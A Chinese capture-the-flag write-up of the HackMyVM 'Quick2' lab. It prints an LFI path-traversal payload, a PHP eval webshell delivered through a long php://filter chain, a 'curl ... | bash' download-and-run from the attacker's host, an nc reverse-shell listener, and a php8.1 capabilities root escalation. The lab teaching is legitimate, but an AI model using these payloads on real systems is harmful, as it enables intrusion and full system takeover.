Quick2 - HackMyVM

简介

难度:简单

靶场地址:https://hackmyvm.eu/machines/machine.php?vm=Quick2

image-20240219005030343

本地环境

虚拟机:vitual box

靶场IP(quick2):192.168.56.103

跳板机IP(windows 10):192.168.56.1 192.168.190.100

渗透机IP(ubuntu 22.04):192.168.190.30

扫描

小靶场,用nmap简单扫一下即可:

nmap -p 1-65535 -T4 -A -v 192.168.56.103

得到两个敏感端口:22和80

image-20240219005736517

http服务

先从网页入手,多点击几个网页,可以注意到URL是通过直接传入文件名来进行访问,怀疑有文件包含漏洞

image-20240219005942354

image-20240219010235216

image-20240219010325888

文件包含漏洞

传入路径./../../../etc/passwd,成功读取到文件内容

image-20240219010705728

但实际上后续既无法使用filter也无法使用RFI,没办法用常规手段传shell。

那就继续收集信息:回到刚才泄露出来的用户目录,筛选出两个用户andrew和nick:

image-20240219014559838

先检测第一个andrew,该用户目录下无法读取文件(其实读一下.bashrc就能基本判断出来),然后检测nick,得到回显

image-20240219014800742

flag格式默认为user.txt,读取,得到第一个flag

HMV{Its-gonna-be-a-fast-ride}

image-20240219014906597

目录遍历

后来想找找有没有其他文件,就直接遍历一下目录,然后找到新的文件

image-20240219015731981

然后进入神秘领域

image-20240219015834580

虽然也是LFI,但这次的可以filter了,所以传shell很方便。

image-20240219021314606

getshell

准备传入木马。先在跳板机上做两个端口转发,一个反弹shell一个做http服务。

netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=40000 connectaddress=192.168.190.30 connectport=40000
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=40001 connectaddress=192.168.190.30 connectport=40001

image-20240219010903912

准备webshell:

<?php eval($_POST["a"]);?>'

然后用php_filter_chain_generator.py生成编码的webshell:

image-20240219101842472

使用蚁剑,密码为a,访问URL:

http://192.168.56.103/file.php?file=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP866.CSUNICODE|convert.iconv.CSISOLATIN5.ISO_6937-2|convert.iconv.CP950.UTF-16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.iconv.PT154.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.DEC.UTF-16|convert.iconv.ISO8859-9.ISO_6937-2|convert.iconv.UTF16.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM860.UTF16|convert.iconv.ISO-IR-143.ISO2022CNEXT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.CP1163.CSA_T500|convert.iconv.UCS-2.MSCP949|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.BIG5.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp

成功连接:

image-20240219101912724

然后在渗透机上起一个http服务,用来传输shell:

python3 -m http.server 40000

再用python起一个监听:

rlwrap -cAr nc -lvvp 40001

image-20240219102607276

蚁剑上起一个终端,输入命令:

curl http://192.168.56.1:40000/shell.sh | bash

image-20240219102814836

得到shell,然后用python升级一下,得到完整的shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'

image-20240219102945587

提权

先把linpeas.sh放到http服务上,下载运行

image-20240219110143495

然后就能看到php8.1可以进行capabilities提权:

image-20240219111532914

直接输入如下命令即可:

php8.1 -r "posix_setuid(0); system('/bin/bash');"

image-20240219111627115

提权成功,读取/root/root.txt,得到flag:

HMV{This-was-a-Quick-AND-fast-machine}

  • 5
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
### 回答1: quicklook-3.6.11.msi是一种安装文件,用于安装QuickLook软件的版本3.6.11。QuickLook是一款用于Windows操作系统的实用工具,它允许用户在不打开文件的情况下快速预览文件内容。 该安装文件通常以.msi文件格式提供,这是Windows Installer的一种标准安装包格式。用户可以通过双击安装文件开始安装过程。安装过程可能需要用户确认许可协议并选择安装位置。 安装完成后,用户可以在桌面或任务栏中找到QuickLook的图标。当用户需要预览文件时,只需选中文件,按下空格键或单击鼠标右键并选择“QuickLook”选项即可。QuickLook将会在一个小窗口中显示文件的内容,包括文本、图像、音频、视频等。用户可以使用鼠标滚轮或方向键浏览文件内容,还可以调整预览窗口的大小。 通过使用QuickLook,用户可以更加高效地浏览文件内容,无需打开包括Office文档、PDF、图片、音视频等各种类型文件的相关应用程序。这不仅节省了时间,还避免了不必要的文件打开和关闭操作。 总而言之,quicklook-3.6.11.msi是用于安装QuickLook软件版本3.6.11的安装文件,该软件可以帮助用户在Windows操作系统上快速预览各种类型的文件内容,提高工作效率。 ### 回答2: quicklook-3.6.11.msi 是一款安装程序,用于安装QuickLook软件的版本号为3.6.11。QuickLook是一款在Windows系统上功能强大的预览工具,可以帮助用户快速预览各种文件,包括文本文档、图片、音频、视频等。 通过安装quicklook-3.6.11.msi,用户可以在文件资源管理器中直接使用快捷键进行文件预览,无需打开对应的应用程序。这种快速预览的功能大大提高了用户的工作效率,特别是在需要查看大量文件的情况下。 此外,quicklook-3.6.11.msi 的安装过程相对简单,只需下载并运行该安装程序,按照提示进行安装即可。安装完成后,用户可以根据自己的需求进行设置,选择需要预览的文件类型,并自定义快捷键等。 总的来说,quicklook-3.6.11.msi 是一款方便实用的预览工具安装程序,用户可以通过安装该程序,快速预览各种文件,提高工作效率。 ### 回答3: quicklook-3.6.11.msi是一个Windows安装程序,用于安装QuickLook软件的版本3.6.11。QuickLook是一个轻量级的文件预览工具,可以在不打开文件的情况下快速查看文件的内容。该软件支持预览多种文件类型,包括文本文件、图片、音频、视频和压缩文件等。使用QuickLook可以在不打开文件的情况下预览文件内容,方便用户快速浏览文件,节省时间和提高工作效率。 通过安装quicklook-3.6.11.msi,用户可以将QuickLook软件添加到自己的Windows操作系统中。安装过程通常很简单,只需双击运行.msi文件,按照安装向导的指示进行操作即可完成安装。一旦安装完成,用户可以通过右键单击文件,在弹出的菜单中选择QuickLook选项来预览文件。使用QuickLook可以快速预览多种文件类型,无需打开相应的程序,省去了打开文件的时间和麻烦。 除了基本的文件预览功能,QuickLook还提供了一些其他的实用功能,如复制文件路径、打开文件所在的文件夹等。用户可以通过设置界面对QuickLook进行自定义配置,如调整预览窗口的大小和位置,选择预览文件的方式等。 总之,quicklook-3.6.11.msi是安装QuickLook软件的安装程序,安装完成后可以在Windows系统中使用QuickLook快速预览多种文件类型的内容,提高工作效率。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值